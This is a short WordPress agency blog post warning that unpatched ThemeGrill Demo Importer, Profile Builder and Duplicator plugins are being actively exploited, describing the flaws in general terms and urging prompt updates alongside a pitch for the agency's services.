Skip to main content

Popular WordPress plugins are being hacked

Popular WordPress plugins are being hacked

WordPress Plugin Security

If you need another reason to keep WordPress updated, several popular plugins are being hacked right now!

WordPress Plugins have had some issues before, but recently, web hackers have been taking advantage of security flaws discovered in some popular WordPress plugins. They have begun to target websites that still run vulnerable versions of them.

According to BleepingComputer, hackers are actively attacking unpatched versions of the ThemeGrill Demo Importer, Profile Builder and Duplicator plugins. What these plugins have in common is the fact they were all revealed to contain a rather large security flaw. Unsurprisingly, this has now started to be exploited by malicious people.

It’s been estimated by several WordPress experts that there are literally thousands of WordPress websites currently at risk of exploitation. This is all because these three plugins have not been updated by website managers.

For the technical details, see below, but the point is that if you have a website that is running any of these plugins, please update them asap. Or you could get a WordPress expert to help you. Shameless plug for our services!

Get in touch

If you’d like to chat about how we can help you with your WordPress plugins

Contact us

The Exploits

ThemeGrill Demo Importer (below 1.6.3) – the bug allows unauthenticated users to log in as administrator and wipe the site’s entire database.
Profile Builder free and Pro (below 3.1.1) – flaw allows an unauthenticated user to gain administrator privileges.

In some reported cases, website hackers have managed to inject malicious code into normally safe JavaScript files. The purpose is to load another script from an external source, which redirects site visitors to potentially malicious locations. For example, someone trying to visit your website could instead be taken to a random porn site, or even worse, somewhere that tries to get money out of them.
Now imagine if this is done while making it look like the request is coming from your business!

Looking at the WordPress plugin download statistics, and also based on update rates, we estimate that around 950,000 sites are still running a vulnerable installation of one of these plugins.

If you take one thing away from this article let it be the following.
When a WordPress security update is released, make it an immediate priority to install it on your site.

Want some help?

If you’d like us to help you with any WordPress updates or to fix any security flaws, please get in touch with us via our contact page.